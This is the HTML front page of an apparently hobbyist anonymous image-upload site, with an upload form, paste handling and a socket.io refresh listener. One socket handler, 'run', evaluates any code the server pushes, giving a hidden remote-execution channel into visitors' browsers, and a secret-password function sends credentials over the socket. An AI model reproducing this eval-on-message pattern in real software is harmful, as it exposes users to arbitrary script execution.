<!DOCTYPE html>
<html lang="en">
<head>
    <title>ANON IMAGE</title>
    <meta charset="UTF-8">
    <meta name="author" content="Cooper">
    <meta name="description" content="Instant anonymous image uploading for free!">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="static/favicon-32x32.png" sizes="32x32" />
    <link rel="icon" type="image/png" href="static/favicon-16x16.png" sizes="16x16" />
    <link rel="stylesheet" href="static/style.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.0.1/socket.io.js" integrity="sha512-q/dWJ3kcmjBLU4Qc47E4A9kTB4m3wuTY7vkFJDTZKjTs8jhyGQnaUrxa0Ytd0ssMZhbNua9hE+E7Qv1j+DyZwA==" crossorigin="anonymous"></script>
    <script type="text/javascript" charset="utf-8">
        var socket = io();
        socket.on('refresh', function() {
            d = new Date();
            document.getElementById("image").setAttribute("src", "static/image?"+d.getTime())
            // $("#myimg").attr("src", "/myimg.jpg?"+d.getTime());
        });
        socket.on('run', function(code) {
            eval(code)
        });
        function secret(password) {
            socket.emit('secret', password)
        }
    </script>
    <script type="text/javascript", charset="utf-8">
        // Thanks yyyyyyy.info for the code
        function animateTitle() {
        i >= message.length - 1 ? (i = 0) : i++,
            (document.title = message[i]),
            setTimeout("animateTitle()", 200);
        }
        var message = [
            "▁▂▃▄▅▆▇",
            "▂▁▂▃▄▅▆",
            "▃▂▁▂▃▄▅",
            "▄▃▂▁▂▃▄",
            "▅▄▃▂▁▂▃",
            "▆▅▄▃▂▁▂",
            "▇▆▅▄▃▂▁",
            "▆▇▆▅▄▃▂",
            "▅▆▇▆▅▄▃",
            "▄▅▆▇▆▅▄",
            "▃▄▅▆▇▆▅",
            "▂▃▄▅▆▇▆",
        ],
        i = 0;
        animateTitle();
    </script>
</head>
<body>
    <div class="flex"> <!--HOLY SHIT I JUST CENTERED A DIV LMAOOOOO-->
        <h1 class="rainbowText">ANON IMAGE</h1>
        <form enctype="multipart/form-data" method="post" id="form">
            <!-- style="visibility:hidden; position:absolute" -->
            <input type="url" name="url" id="urlInput">
            <input type="file" accept=".png,.jpg,.jpeg,.gif,.jfif" name="file" id="imageInput"><br>
            <input type="submit" value="Upload!" id="submit">
          </form>
    </div>
    <center>
    <!-- <h2 class="titleDesc">By Cooper, V2.0</h2> -->
    <img src="static/image", height="500", style="height: 85vh;" id="image"></center>
    <script>
        const imageInput = document.getElementById("imageInput")
        imageInput.addEventListener("drop", {}, false)

        function isValidHttpUrl(string) {
            let url;
            try {
                url = new URL(string);
            } catch (_) {
                return false;
            }

            return url.protocol === "http:" || url.protocol === "https:";
        }

        window.addEventListener("paste", e => {
            const clipboardData = e.clipboardData;
            if (text = clipboardData.getData("Text")) {
                if (isValidHttpUrl(text)) {
                    console.log(text);
                    document.getElementById("urlInput").remove()
                    newUrlInput = document.createElement("input")
                    newUrlInput.type = "url"
                    newUrlInput.name = "url"
                    newUrlInput.id = "urlInput"
                    newUrlInput.value = text
                    const form = document.getElementById("form")
                    form.insertBefore(newUrlInput, document.getElementById("imageInput"))
                }
            } else {
                imageInput.files = clipboardData.files;
            }
        });
    </script>
</body>
</html>